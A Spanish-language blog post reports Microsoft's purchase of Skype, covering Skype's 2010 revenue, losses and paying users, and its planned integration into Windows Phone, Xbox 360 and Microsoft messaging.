Skype perdió 7 millones de dólares, con ingresos de 860 millones el año pasado, acumulando unas deudas por valor 544.000 dólares a finales del 2010. Sin embargo, el servicio es utilizado habitualmente por unos 170 millones de usuarios que generaron 207.000 millones de minutos en llamadas telefónicas.

El principal problema de Skype es que la inmensa mayoría de sus usuarios no pagan ninguna cantidad por usar el servicio y que el aumento del gasto que supone mantener la infraestructura es paralelo al incremento de usuarios. Según la compañía, solamente unos 8.8 millones de usuarios están abonados a los servicios de pago que permiten entre otras ventajas realizar llamadas a terminales fijos o móviles.

Una nueva empresa by Microsoft

Una vez finalizada la adquisición Microsoft mantendrá a Skype como empresa independiente bajo la dirección de Tony Bates, quien responderá directamente al director general de Microsoft, Steve Ballmer. El manenimeinto de la empresa fuera de la “òrbita” directa del gigante facilatará que esta siga desarrollando aplicaciones para otras plataformas y sistemas operativos, entre ellos iOS (iPhone) y Android.

Asimismo trabajará en colaboración con los ingenieros de software de Microsoft para integrarlo en Windows Phone de manera nativa otorgando a este sistema operativo una ventaja competitiva frente a Apple y Google.

También estará presente en los servicios de mensajería tanto residencial como profesional de Microsoft y la presencia de esta tecnología en Xbox 360 facilitará el desarrollo de juegos sociales al contar con una plataforma solida y muy extendida en el mercado.

La compra de Skype rompe el anterior récord de 6.000 millones de dólares que pago Microsoft por el servicio de publicidad por internet aQuantive y queda muy lejos de los 400 millones que pagó en 1997 a los creadores de Hotmail y que supuso en ese momento todo un record.

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)